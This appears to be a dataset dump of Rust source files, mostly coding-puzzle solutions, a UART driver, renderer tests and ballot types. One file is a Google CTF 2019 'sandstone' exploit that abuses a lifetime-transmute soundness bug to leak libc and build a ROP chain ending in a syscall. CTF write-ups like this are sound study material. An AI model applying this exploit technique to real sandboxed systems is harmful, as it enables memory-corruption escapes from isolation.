Columns:

blob_id             stringlengths    40 to 40
language            stringclasses    1 value
repo_name           stringlengths    5 to 140
path                stringlengths    5 to 183
src_encoding        stringclasses    6 values
length_bytes        int64            12 to 5.32M
score               float64          2.52 to 4.94
int_score           int64            3 to 5
detected_licenses   listlengths      0 to 47
license_type        stringclasses    2 values
text                stringlengths    12 to 5.32M
download_success    bool             1 class
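Each record below lists these fields in column order, with the source file contents in text. As a rough, hypothetical sketch only (not part of the dump itself), a row could be modeled in Rust as follows; the field names come from the columns above, while the struct name and the concrete Rust types are assumptions inferred from the stated ranges:

```rust
/// Hypothetical model of one row of this dump. Field names mirror the
/// columns above; the concrete types are assumptions inferred from the
/// stated ranges, not a published schema.
#[derive(Debug)]
struct Row {
    blob_id: String,                // 40-character blob hash
    language: String,               // one class: "Rust"
    repo_name: String,
    path: String,
    src_encoding: String,           // e.g. "UTF-8"
    length_bytes: u64,              // 12 to 5.32M
    score: f64,                     // 2.52 to 4.94
    int_score: u8,                  // 3 to 5
    detected_licenses: Vec<String>, // 0 to 47 entries
    license_type: String,           // "permissive" or "no_license"
    text: String,                   // full source file contents
    download_success: bool,         // single class (true)
}
```
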
blob_id: 4c6a1285af8a12d4563168774e4ae4a31d4669a9
language: Rust
repo_name: lucifer1004/AtCoder
path: /abc189/src/bin/b.rs
src_encoding: UTF-8
length_bytes: 342
score: 2.734375
int_score: 3
detected_licenses: []
license_type: no_license
text:
use proconio::input; fn main() { input! { n: usize, mut x: usize, liquor: [(usize, usize); n], } x *= 100; let mut tot = 0; for i in 0..n { tot += liquor[i].0 * liquor[i].1; if tot > x { println!("{}", i + 1); return; } } println!("-1"); }
download_success: true

blob_id: 9f1e0ca737b58cb698026c14aba7dfb6a072f6d0
language: Rust
repo_name: yoava333/ctf-writeups
path: /googlectf_quals/2019/sandstone/ex.rs
src_encoding: UTF-8
length_bytes: 4,187
score: 2.8125
int_score: 3
detected_licenses: []
license_type: no_license
text:
{ use std::io; use std::io::prelude::*; trait A { fn my_func(&self) -> &mut [u64]; } struct B { b: u64, } struct C { c: u64, } impl A for B { fn my_func(&self) -> &mut [u64] { get_dangling() } } impl A for C { fn my_func(&self) -> &mut [u64] { get_dangling() } } fn is_prime(a: u64) -> bool { if a < 2 { return false; } if a % 2 == 0 { return true; } for i in 3..a { if a % i == 0 { return false; } } true } fn get_trait_a() -> Box<dyn A> { let n = if let Ok(args) = std::env::var("CARGO_EXTRA_ARGS") { args.len() as usize } else { 791913 }; if is_prime(n as u64) { Box::new(B { b: 0 }) } else { Box::new(C { c: 0 }) } } trait Object { type Output; } impl<T: ?Sized> Object for T { type Output = &'static mut [u64]; } fn foo<'a, T: ?Sized>(x: <T as Object>::Output) -> &'a mut [u64] { x } fn transmute_lifetime<'a, 'b>(x: &'a mut [u64]) -> &'b mut [u64] { foo::<dyn Object<Output = &'a mut [u64]>>(x) } // And yes this is a genuine `transmute_lifetime` fn get_dangling<'a>() -> &'a mut [u64] { io::stdout().write(b"hello\n"); let mut a: [u64; 128] = [0; 128]; let mut x = 0; transmute_lifetime(&mut a) } fn my_print_str(s: &str) { io::stdout().write(s.as_bytes()); } fn my_print(n: u64) { let s: String = n.to_string() + "\n"; io::stdout().write(s.as_bytes()); } // This function is only used to raise the stack frame and allow the dangling // slice to overwrite the stack frame of low stack frames. fn rec(a: &mut [u64], b: &mut [u64], attack: &mut [u64], n: u64, lib_c: u64) { let mut array: [u64; 3] = [0; 3]; a[0] += 1; b[0] += 1; array[0] = a[0] + 1; array[1] = a[0] + b[1] + 1; if a[0] > n { // ubuntu 19.04 let pop_rax_ret = lib_c + 0x0000000000047cf8; let syscall_inst = lib_c + 0x0000000000026bd4; let ret = lib_c + 0x026422; // Overwrite the stack with ret slide for (j, el) in attack.iter_mut().enumerate() { *el = ret; } // Write our small rop chain let x = 50; attack[x] = pop_rax_ret; attack[x + 1] = 0x1337; attack[x + 2] = syscall_inst; // Trigger return; } // Random calculation to kill compiler optimizations. if a[0] > 30 { b[0] = a[0] + a[1]; rec(b, &mut array, attack, n, lib_c); } else { b[1] = a[2] + a[0]; rec(&mut array, a, attack, n, lib_c); } } // using external variables to kill compiler optimizations let n = if let Ok(args) = std::env::var("BLA") { args.len() as usize } else { 30 }; // using external variables to kill compiler optimizations let n2 = if let Ok(args) = std::env::var("BLA") { 10 } else { 100 }; // Using the dyn trait so that the compiler will execute the // get_dangling function in a higher stack frame. let my_a = get_trait_a(); // getting the random stack let mut r = my_a.my_func(); // Just random content let mut v: Vec<u64> = Vec::with_capacity(n); v.push(1); v.push(1); v.push(1); // Adding some content; let mut b: Vec<u64> = Vec::with_capacity(n); b.push(1); b.push(2); b.push(3); // We need to write output buffers to get lib-c gadgets my_print_str("Give me gadegts\n"); let lib_c_addr = r[62]; let lib_c = lib_c_addr - 628175; my_print_str("===============\nlib_c base = "); my_print(lib_c); my_print_str("===============\n"); // Exploit rec(&mut v, &mut b, r, n2, lib_c); }
download_success: true

blob_id: 48e43606ab657088197690c51f5fca784a0b3442
language: Rust
repo_name: prabhugopal/Sprocket
path: /src/uart.rs
src_encoding: UTF-8
length_bytes: 2,116
score: 2.796875
int_score: 3
detected_licenses: [ "MIT" ]
license_type: permissive
text:
use x86::shared::io; use traps; use picirq; use core::sync::atomic::{AtomicBool, Ordering}; const COM1: u16 = 0x3f8; static UART_INITIALIZED: AtomicBool = AtomicBool::new(false); pub struct Uart; impl Uart { pub fn new() -> Result<Uart, ()> { // Consume token and init the UART (if present) if !UART_INITIALIZED.load(Ordering::SeqCst) { UART_INITIALIZED.store(true, Ordering::SeqCst); unsafe { Self::init() } } else { Err(()) } } unsafe fn init() -> Result<Uart, ()> { // unsafe because port I/O is hideously unsafe and a misconfigured PIC is bad // we may be able to leverage better abstractions though // see: http://www.randomhacks.net/2015/11/16/bare-metal-rust-configure-your-pic-interrupts/ io::outb(COM1, 0); io::outb(COM1 + 3, 0x80); // Unlock divisor io::outb(COM1, (115200u32 / 9600u32) as u8); io::outb(COM1 + 1, 0); io::outb(COM1 + 3, 0x03); // Lock divisor, 8 data bits. io::outb(COM1 + 4, 0); io::outb(COM1 + 1, 0x01); // Enable receive interrupts. // If status is 0xFF, no serial port. if io::inb(COM1 + 5) == 0xFF { return Err(()); } // Acknowledge pre-existing interrupt conditions; // enable interrupts. io::inb(COM1 + 2); io::inb(COM1); picirq::PIC.lock().enable_irq(traps::COM1_IRQ as u32); /* // Announce that we're here. for(p="xv6...\n"; *p; p++) { uartputc(*p); } */ Ok(Uart {}) } pub fn write_byte(&mut self, c: u8) { unsafe { for _ in 0..128 { if io::inb(COM1 + 5) & 0x20 != 0 { break; } } io::outb(COM1, c); } } fn microdelay(_: i32) {} pub fn read_byte(&mut self) -> Option<u8> { unsafe { if (io::inb(COM1 + 5) & 0x01) == 0 { None } else { Some(io::inb(COM1)) } } } }
download_success: true

blob_id: 704e216fb72fc3487bfcd276ed9354ffbca54642
language: Rust
repo_name: Antiarchitect/rust_rectangle
path: /src/main.rs
src_encoding: UTF-8
length_bytes: 1,597
score: 4.03125
int_score: 4
detected_licenses: []
license_type: no_license
text:
trait TraitPoint { fn new(x: f64, y: f64) -> Self; fn x(&self) -> &f64; fn y(&self) -> &f64; fn distance_to(&self, other: &Self) -> f64 { ((*other.x() - *self.x()).powi(2) + (*other.y() - *self.y()).powi(2)).sqrt() } } struct Point { x: f64, y: f64 } impl TraitPoint for Point { fn new(x: f64, y: f64) -> Self { Point { x: x, y: y } } fn x(&self) -> &f64 { &self.x } fn y(&self) -> &f64 { &self.y } } trait TraitRectangle<'a> { type Point: TraitPoint; fn new(topleft: &'a Self::Point, bottomright: &'a Self::Point) -> Self; fn topleft(&self) -> &Self::Point; fn bottomright(&self) -> &Self::Point; fn height(&self) -> f64 { (*self.topleft().y() - *self.bottomright().y()).abs() } fn width(&self) -> f64 { (*self.topleft().x() - *self.bottomright().x()).abs() } fn area(&self) -> f64 { (self.height() * self.width()) } } struct Rectangle<'a> { tl: &'a Point, br: &'a Point } impl<'a> TraitRectangle<'a> for Rectangle<'a> { type Point = Point; fn new(topleft: &'a Point, bottomright: &'a Point) -> Rectangle<'a> { Rectangle { tl: topleft, br: bottomright } } fn topleft(&self) -> &Point { self.tl } fn bottomright(&self) -> &Point { self.br } } fn main() { let tl_p = Point::new(1.1, 2.2); let br_p = Point::new(3.3, 4.4); let rect = Rectangle::new(&tl_p, &br_p); println!("Width: {}", rect.width()); println!("Height: {}", rect.height()); println!("AREA: {}", rect.area()); }
download_success: true

blob_id: 064957fb38024e382dda62595bef0f6adf8f8d3c
language: Rust
repo_name: igowen/dashing
path: /src/graphics/render/tests.rs
src_encoding: UTF-8
length_bytes: 8,966
score: 2.90625
int_score: 3
detected_licenses: [ "LicenseRef-scancode-generic-cla", "Apache-2.0" ]
license_type: permissive
text:
// Copyright 2018 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #[cfg(test)] // The output of the renderer is intended to be pixel-perfect, so the tests are written with // that in mind. use image; use png; use super::*; use crate::resources::color::Palette; /// There's a lot of boilerplate in setting up the offscreen renderer and extracting the rendered /// image, so we use a separate support fixture to manage that. struct RenderTestFixture { renderer: Renderer, sprite_width: u32, sprite_height: u32, width: u32, height: u32, } impl RenderTestFixture { fn new(width: u32, height: u32) -> RenderTestFixture { // Load the test sprite texture. // TODO: get rid of this once the sprite-loading code is done. let img = include_bytes!("testdata/12x12.png"); let mut decoder = png::Decoder::new(&img[..]); // Need to set this so the index values don't get converted to RGBA. decoder.set_transformations(png::Transformations::IDENTITY); let mut reader = decoder.read_info().unwrap(); let mut imgdata = vec![0u8; reader.output_buffer_size()]; reader.next_frame(&mut imgdata[..]).unwrap(); let tex = SpriteTexture::new_from_pixels( &imgdata[..], reader.info().size().0 as usize, reader.info().size().1 as usize, reader.info().size().0 as usize / 16, reader.info().size().1 as usize / 16, 256, ) .unwrap(); let sprite_width = tex.sprite_width(); let sprite_height = tex.sprite_height(); let renderer = Renderer::new( None, (width, height), &tex, [0, 255, 0].into(), wgpu::FilterMode::Nearest, wgpu::PresentMode::Fifo, ) .unwrap(); RenderTestFixture { renderer, width, height, sprite_width: sprite_width as u32, sprite_height: sprite_height as u32, } } /// Extract the rendered image from the offscreen context. fn extract_render_result(&mut self) -> Box<[u8]> { self.renderer.fetch_render_output().unwrap() } } #[test] fn render_one_cell() { let actual_image = { let mut fixture = RenderTestFixture::new(1, 1); fixture.renderer.update( [SpriteCell { palette: Palette::mono([255, 255, 255]).set(0, [0, 0, 0]), sprite: 1, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/one_cell.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn render_one_cell_sprite_change() { let mut fixture = RenderTestFixture::new(1, 1); fixture.renderer.update( [SpriteCell { palette: Palette::mono([255, 255, 0]).set(0, [0, 0, 0]), sprite: 2, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); let actual_image = fixture.extract_render_result(); let expected_image = image::load_from_memory(include_bytes!("testdata/one_cell.png")) .unwrap() .to_rgba8() .into_raw(); // These shouldn't match. 
assert_ne!(&actual_image[..], &expected_image[..]); fixture.renderer.update( [SpriteCell { palette: Palette::mono([255, 255, 255]).set(0, [0, 0, 0]), sprite: 1, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); let actual_image_2 = fixture.extract_render_result(); // These should. assert_eq!(&actual_image_2[..], &expected_image[..]); } #[test] fn render_2x2_with_color() { let actual_image = { let mut fixture = RenderTestFixture::new(2, 2); fixture.renderer.update( [ SpriteCell { palette: Palette::mono([255, 0, 255]).set(0, [0, 0, 0]), sprite: 72, ..Default::default() }, SpriteCell { palette: Palette::mono([0, 255, 255]).set(0, [0, 0, 0]), sprite: 105, ..Default::default() }, SpriteCell { palette: Palette::mono([255, 255, 0]).set(0, [0, 0, 0]), sprite: 33, ..Default::default() }, SpriteCell { palette: Palette::mono([0, 255, 0]).set(0, [0, 0, 0]), sprite: 19, ..Default::default() }, ] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/hi.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(actual_image.len(), expected_image.len()); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn gray() { let actual_image = { let mut fixture = RenderTestFixture::new(1, 1); fixture.renderer.update( [SpriteCell { palette: Palette::mono([128, 128, 128]), sprite: 0, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/50pct_gray.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn big() { let actual_image = { let mut fixture = RenderTestFixture::new(680, 10); fixture.renderer.update( vec![ SpriteCell { palette: Palette::mono([128, 128, 128]).set(1, [255, 0, 0]), sprite: 1, ..Default::default() }; 6800 ] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/big.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn full_palette() { let img = include_bytes!("testdata/full_palette.png"); let mut decoder = png::Decoder::new(&img[..]); // Need to set this so the index values don't get converted to RGBA. decoder.set_transformations(png::Transformations::IDENTITY); let mut reader = decoder.read_info().unwrap(); let mut imgdata = vec![0u8; reader.output_buffer_size()]; reader.next_frame(&mut imgdata[..]).unwrap(); let tex = SpriteTexture::new_from_pixels( &imgdata[..], reader.info().size().0 as usize, reader.info().size().1 as usize, reader.info().size().0 as usize, reader.info().size().1 as usize, 1, ) .unwrap(); let actual_image = { let mut renderer = Renderer::new( None, (1, 1), &tex, [0, 255, 0].into(), wgpu::FilterMode::Nearest, wgpu::PresentMode::Fifo, ) .unwrap(); renderer.update( vec![ SpriteCell { palette: Default::default(), sprite: 0, ..Default::default() }; 1 ] .iter(), ); // Render the frame. renderer.render_frame().unwrap(); renderer.fetch_render_output().unwrap() }; let expected_image = image::load_from_memory(include_bytes!("testdata/full_palette_output.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); }
download_success: true

blob_id: 73f84c991b2218155e097afeed0b7456fc039c2c
language: Rust
repo_name: willdoescode/william_lane_connect_four
path: /src/tests/test_new.rs
src_encoding: UTF-8
length_bytes: 276
score: 2.703125
int_score: 3
detected_licenses: []
license_type: no_license
text:
use crate::*; use std::io::stdout; #[test] fn test_new() { let board = Game::new(); let normal = Game { count: [6; 7], board: [['-'; 7]; 6], player: 'O', moves: 0, stdout: stdout(), }; assert_eq!(board.display_board(), normal.display_board()); }
download_success: true

blob_id: f46495786d14b20877fd97a8fb13c019aefe18c2
language: Rust
repo_name: trevday/rust-raytracer
path: /src/texture.rs
src_encoding: UTF-8
length_bytes: 4,305
score: 2.75
int_score: 3
detected_licenses: []
license_type: no_license
text:
use crate::base::BasicTwoTuple; use crate::color::RGB; use crate::point::Point3; use crate::utils::{clamp, noise, turbulence}; use image::{DynamicImage, GenericImageView}; use serde::Deserialize; use std::{convert::TryFrom, ops, sync::Arc}; #[derive(Deserialize)] pub struct TexCoord(pub BasicTwoTuple<f32>); impl Copy for TexCoord {} impl Clone for TexCoord { fn clone(&self) -> TexCoord { *self } } impl TexCoord { pub fn new(x: f32, y: f32) -> TexCoord { TexCoord(BasicTwoTuple::new(x, y)) } pub fn u(&self) -> f32 { self.0.x } pub fn v(&self) -> f32 { self.0.y } pub fn clamp_to_valid_coords(&self) -> TexCoord { TexCoord::new( clamp(self.u(), 0.0_f32, 1.0_f32), clamp(self.v(), 0.0_f32, 1.0_f32), ) } } impl ops::Add for TexCoord { type Output = TexCoord; fn add(self, rhs: TexCoord) -> TexCoord { TexCoord(self.0.add(rhs.0)) } } impl ops::Sub for TexCoord { type Output = TexCoord; fn sub(self, rhs: TexCoord) -> TexCoord { TexCoord(self.0.sub(rhs.0)) } } impl ops::Mul<f32> for TexCoord { type Output = TexCoord; fn mul(self, rhs: f32) -> TexCoord { TexCoord(self.0.mul(rhs)) } } pub trait Texture { fn value(&self, uv: &TexCoord, p: &Point3) -> RGB; fn bump_value(&self, uv: &TexCoord, p: &Point3) -> f32 { let bump = self.value(uv, p); (bump.r() + bump.g() + bump.b()) / 3.0_f32 } } pub type SyncTexture = dyn Texture + Send + Sync; #[derive(Deserialize)] pub struct Constant { color: RGB, } impl Texture for Constant { fn value(&self, _uv: &TexCoord, _p: &Point3) -> RGB { self.color } } pub struct Test; impl Texture for Test { fn value(&self, uv: &TexCoord, _p: &Point3) -> RGB { RGB::new( uv.u(), uv.v(), if 1.0_f32 - uv.u() - uv.v() < 0.0_f32 { 0.0_f32 } else { 1.0_f32 - uv.u() - uv.v() }, ) } } pub struct Checker { repeat: f32, odd: Arc<SyncTexture>, even: Arc<SyncTexture>, } impl Checker { pub fn new(repeat: f32, odd: Arc<SyncTexture>, even: Arc<SyncTexture>) -> Checker { Checker { repeat: repeat, odd: odd, even: even, } } } impl Texture for Checker { fn value(&self, uv: &TexCoord, p: &Point3) -> RGB { let sines = (self.repeat * p.x()).sin() * (self.repeat * p.y()).sin() * (self.repeat * p.z()).sin(); if sines < 0.0_f32 { self.odd.value(uv, p) } else { self.even.value(uv, p) } } } pub struct Image { img: Arc<DynamicImage>, } impl Image { pub fn new(img: Arc<DynamicImage>) -> Image { Image { img: img } } } impl Texture for Image { fn value(&self, uv: &TexCoord, _p: &Point3) -> RGB { let i = (uv.u() * self.img.width() as f32) as u32 % self.img.width(); let j = ((1_f32 - uv.v()) * self.img.height() as f32) as u32 % self.img.height(); let pixel = self.img.get_pixel(i, j); RGB::new( pixel[0] as f32 / 255_f32, pixel[1] as f32 / 255_f32, pixel[2] as f32 / 255_f32, ) .inverse_gamma_correct() } } #[derive(Deserialize)] pub struct Noise { scale: f32, } impl Texture for Noise { fn value(&self, _uv: &TexCoord, p: &Point3) -> RGB { return RGB::new(0.5_f32, 0.5_f32, 0.5_f32) * (1.0_f32 + noise(&(*p * self.scale))); } } #[derive(Deserialize)] pub struct Turbulence { scale: f32, depth: u32, omega: Omega, } #[derive(Deserialize)] #[serde(try_from = "f32")] struct Omega(f32); impl TryFrom<f32> for Omega { type Error = &'static str; fn try_from(v: f32) -> Result<Self, Self::Error> { if v > 1.0_f32 { Err("Turbulence omega is greater than 1.") } else if v < 0.0_f32 { Err("Turbulence omega is less than 0.") } else { Ok(Omega(v)) } } } impl Texture for Turbulence { fn value(&self, _uv: &TexCoord, p: &Point3) -> RGB { return RGB::new(1.0_f32, 1.0_f32, 1.0_f32) * turbulence(&(*p * self.scale), self.depth, self.omega.0); } }
download_success: true

blob_id: 19b125e1f1a82c774884c64a43c3f22c618581d4
language: Rust
repo_name: Henning-K/exercism-tasks
path: /queen-attack/src/lib.rs
src_encoding: UTF-8
length_bytes: 634
score: 3.578125
int_score: 4
detected_licenses: []
license_type: no_license
text:
pub struct ChessPosition { x: i32, y: i32, } pub struct Queen { pos: ChessPosition, } impl ChessPosition { pub fn new(x: i32, y: i32) -> Result<Self, String> { if x < 0 || y < 0 || x > 7 || y > 7 { return Err("Invalid Position".to_string()); } Ok(ChessPosition { x: x, y: y }) } } impl Queen { pub fn new(cp: ChessPosition) -> Self { Queen { pos: cp } } pub fn can_attack(&self, other: &Self) -> bool { self.pos.x == other.pos.x || self.pos.y == other.pos.y || ((self.pos.x - other.pos.x) / (self.pos.y - other.pos.y)).abs() == 1 } }
download_success: true

blob_id: 1dc92434201ac9796a74de289c7fd1fa7a99ecca
language: Rust
repo_name: mdaffin/adventofcode
path: /2017/src/lib.rs
src_encoding: UTF-8
length_bytes: 934
score: 2.890625
int_score: 3
detected_licenses: [ "MIT" ]
license_type: permissive
text:
extern crate failure; #[macro_use] extern crate failure_derive; use std::path::Path; use std::fs::File; use std::str::FromStr; use std::io::{self, BufReader, Read}; #[derive(Fail, Debug)] pub enum ParsePartError { #[fail(display = "{} is not a valid part.", _0)] InvalidPartNumber(String), } pub enum Part { One, Two, } impl FromStr for Part { type Err = ParsePartError; fn from_str(s: &str) -> Result<Self, ParsePartError> { match s.as_ref() { "1" | "one" => Ok(Part::One), "2" | "two" => Ok(Part::Two), i => Err(ParsePartError::InvalidPartNumber(i.to_string())), } } } pub fn input_reader<P>(filename: P) -> Result<BufReader<Box<Read>>, io::Error> where P: AsRef<Path> { Ok(if filename.as_ref() == Path::new("-") { BufReader::new(Box::new(io::stdin())) } else { BufReader::new(Box::new(File::open(filename)?)) }) }
download_success: true

blob_id: 29ad69dc37b6912d69dc4e3a8b6dae920a0cf9f8
language: Rust
repo_name: joelverhagen/adventofcode
path: /2017/rust/day8/src/main.rs
src_encoding: UTF-8
length_bytes: 3,709
score: 3.65625
int_score: 4
detected_licenses: []
license_type: no_license
text:
use std::fs::File; use std::io::BufRead; use std::io::BufReader; use std::collections::HashMap; #[derive(Debug)] enum Operator { LessThan, LessThanOrEqual, GreaterThan, GreaterThanOrEqual, Equal, NotEqual, } #[derive(Debug)] struct Condition { register: String, operator: Operator, value: i32, } #[derive(Debug)] struct Instruction { register: String, increase: bool, value: i32, condition: Condition, } fn parse_instruction(line: &str) -> Instruction { let pieces: Vec<&str> = line.split_whitespace().collect(); let register = String::from(pieces[0]); let increase = match pieces[1] { "inc" => true, "dec" => false, _ => panic!("Expected 'inc' or 'dec'."), }; let value = pieces[2].parse::<i32>().expect("Could not parse instruction value as i32."); let condition_register = String::from(pieces[4]); let condition_operator = match pieces[5] { "<" => Operator::LessThan, "<=" => Operator::LessThanOrEqual, ">" => Operator::GreaterThan, ">=" => Operator::GreaterThanOrEqual, "==" => Operator::Equal, "!=" => Operator::NotEqual, _ => panic!("Unexpected condition operator."), }; let condition_value = pieces[6].parse::<i32>().expect("Could not parse condition value as i32."); Instruction { register, increase, value, condition: Condition { register: condition_register, operator: condition_operator, value: condition_value, }, } } fn parse_file(file_name: &str) -> Vec<Instruction> { let f = File::open(file_name).expect("Could not open the specified file."); let reader = BufReader::new(f); reader .lines() .map(|lr| lr.expect("Could not read a line.")) .map(|l| parse_instruction(&l)) .collect() } fn process_instructions(instructions: &Vec<Instruction>) -> (HashMap<&str, i32>, i32) { let mut registers: HashMap<&str, i32> = HashMap::new(); let mut max = 0; for instruction in instructions { let current = *registers.entry(&instruction.condition.register).or_insert(0); let condition_satisfied = match instruction.condition.operator { Operator::LessThan => current < instruction.condition.value, Operator::LessThanOrEqual => current <= instruction.condition.value, Operator::GreaterThan => current > instruction.condition.value, Operator::GreaterThanOrEqual => current >= instruction.condition.value, Operator::Equal => current == instruction.condition.value, Operator::NotEqual => current != instruction.condition.value, }; if !condition_satisfied { continue; } let delta = match instruction.increase { true => instruction.value, false => -1 * instruction.value, }; let entry = registers.entry(&instruction.register).or_insert(0); *entry += delta; let new_value = *entry; if new_value > max { max = new_value; } } (registers, max) } fn get_largest_register_value(registers: &HashMap<&str, i32>) -> i32 { *registers .iter() .map(|(_, v)| v) .max() .unwrap_or(&0) } fn main() { let file_name = "input.txt"; let instructions = parse_file(file_name); let (registers, largest_value) = process_instructions(&instructions); println!("Day 8, part 1: {}", get_largest_register_value(&registers)); println!("Day 8, part 2: {}", largest_value); }
download_success: true

blob_id: 498b83dfc3d09ea4beeed66df0843d09448d0000
language: Rust
repo_name: Geraet/kompositum-rs
path: /src/tests.rs
src_encoding: UTF-8
length_bytes: 787
score: 2.546875
int_score: 3
detected_licenses: [ "MIT" ]
license_type: permissive
text:
// Copyright(c) 2021 René Hansen. // Distributed under the MIT License (http://opensource.org/licenses/MIT) #[cfg(test)] mod tests { use crate::{builder, printer::Printer, IDType}; use multimap::MultiMap; const TREE_MAP_DEF: &[(IDType, IDType)] = &[(1, 2), (1, 3), (1, 4), (4, 5), (4, 6), (1, 7)]; #[test] fn test_from_builder() { let tree_map: MultiMap<IDType, IDType> = TREE_MAP_DEF.iter().cloned().collect(); let root = builder::build_composite(1, &tree_map); root.accept(&mut Printer::new()); } #[test] fn test_component_debug_print() { let tree_map: MultiMap<IDType, IDType> = TREE_MAP_DEF.iter().cloned().collect(); let root = builder::build_composite(1, &tree_map); println!("{:?}", &root); } }
download_success: true

blob_id: afdba96152f21bbc30e902012dc5cb7fb547977e
language: Rust
repo_name: Logicalshift/flowbetween
path: /animation/src/storage/storage_error.rs
src_encoding: UTF-8
length_bytes: 326
score: 2.78125
int_score: 3
detected_licenses: [ "Apache-2.0" ]
license_type: permissive
text:
/// /// Errors from the storage API /// #[derive(Clone, Debug, PartialEq, Serialize, Deserialize)] pub enum StorageError { /// General failure General, /// The storage could not be initialised FailedToInitialise, /// The storage cannot continue because of an eariler error CannotContinueAfterError }
download_success: true

blob_id: 6b560be340c378479745eb241cf77d06fea6bf2f
language: Rust
repo_name: cryptoballot/cryptoballot
path: /cryptoballot/src/ballot.rs
src_encoding: UTF-8
length_bytes: 10,078
score: 3.265625
int_score: 3
detected_licenses: []
license_type: no_license
text:
use indexmap::IndexMap; use prost::Message; #[derive(Serialize, Deserialize, Debug, Clone)] pub struct Ballot { pub id: String, pub contests: Vec<u32>, // List of contest indexes /// Application specific properties. /// /// Hashmaps are not allowed because their unstable ordering leads to non-determinism. #[serde(default)] #[serde(skip_serializing_if = "IndexMap::is_empty")] pub properties: IndexMap<String, serde_json::Value>, } #[derive(Serialize, Deserialize, Debug, Clone)] pub struct Contest { pub id: String, pub index: u32, pub contest_type: ContestType, pub num_winners: u32, pub write_in: bool, pub candidates: Vec<Candidate>, /// Application specific properties. /// /// Hashmaps are not allowed because their unstable ordering leads to non-determinism. #[serde(default)] #[serde(skip_serializing_if = "IndexMap::is_empty")] pub properties: IndexMap<String, serde_json::Value>, } #[derive(Serialize, Deserialize, Debug, Clone)] pub struct Candidate { pub id: String, /// Application specific properties. /// /// Hashmaps are not allowed because their unstable ordering leads to non-determinism. #[serde(default)] #[serde(skip_serializing_if = "IndexMap::is_empty")] pub properties: IndexMap<String, serde_json::Value>, } #[derive(Serialize, Deserialize, Debug, Clone)] #[serde(rename_all = "snake_case")] pub enum ContestType { /// Plurality voting is an electoral system in which each voter is allowed to vote for only one candidate and the candidate /// who polls the most among their counterparts (a plurality) is elected. It may be called first-past-the-post (FPTP), /// single-choice voting, simple plurality, or relative/simple majority. /// /// For Plurality tally, `Selection.score` has no meaning. Plurality, /// Score voting or “range voting” is an electoral system in which voters give each candidate a score, the scores are summed, /// and the candidate with the highest total is elected. It has been described by various other names including “evaluative voting”, /// “utilitarian voting”, and “the point system”. /// /// For Score tally, `Selection.score` represents the number of points assigned to each candidate. Zero is the worst score that can be asssigned to a candidate. Score, /// Approval voting is a single-winner electoral system where each voter may select (“approve”) any number of candidates. /// The winner is the most-approved candidate. /// /// For Approval tally, `Selection.score` has no meaning. Approval, /// The Condorcet method is a ranked-choice voting system that elects the candidate that would win a majority of the vote in all of the head-to-head elections against each of the other candidates. /// The Condorcet method isn’t guarunteed to produce a single-winner due to the non-transitive nature of group choice. /// /// For Condorcet tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. Condorcet, /// The standard Borda count where each candidate is assigned a number of points equal to the number of candidates ranked lower than them. /// It is known as the "Starting at 0" Borda count since the least-significantly ranked candidate is given zero points. 
/// Each candidate is given points according to: /// /// ```number-candidates - candidate-position - 1``` /// /// Example point allocation for a single ballot: /// /// | Position on ballot | Candiate | Points | /// | --------------------|----------|--------| /// | 0 | Alice | 3 | /// | 1 | Bob | 2 | /// | 2 | Carlos | 1 | /// | 3 | Dave | 0 | /// /// For Borda tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. Borda, /// The classic Borda count as defined in Jean-Charles de Borda's [original proposal](http://gerardgreco.free.fr/IMG/pdf/MA_c_moire-Borda-1781.pdf). /// It is known as the "Starting at 1" Borda count since the least-significantly ranked candidate is given one point. /// Each candidate is given points according to: /// /// ```number-candidates - candidate-position``` /// /// Example point allocation for a single ballot: /// /// | Position on ballot | Candiate | Points | /// | --------------------|----------|--------| /// | 0 | Alice | 4 | /// | 1 | Bob | 3 | /// | 2 | Carlos | 2 | /// | 3 | Dave | 1 | /// /// For BordaClassic tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. BordaClassic, /// In the Dowdall system, the highest-ranked candidate obtains 1 point, while the 2nd-ranked candidate receives ½ a point, the 3rd-ranked candidate receives ⅓ of a point, etc. /// An important difference of this method from the others is that the number of points assigned to each preference does not depend on the number of candidates. /// Each candidate is given points according to: /// /// ```1 / (candidate-position + 1)``` /// /// If Dowdall is selected, tallystick will panic if an integer count type is used in the tally. This variant should only be used with a float or rational tally. /// /// Example point allocation for a single ballot: /// /// | Position on ballot | Candiate | Points | /// | --------------------|----------|--------| /// | 0 | Alice | 1 | /// | 1 | Bob | ½ | /// | 2 | Carlos | ⅓ | /// | 3 | Dave | ¼ | /// /// For BordaDowdall tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. BordaDowdall, /// In a modified Borda count, 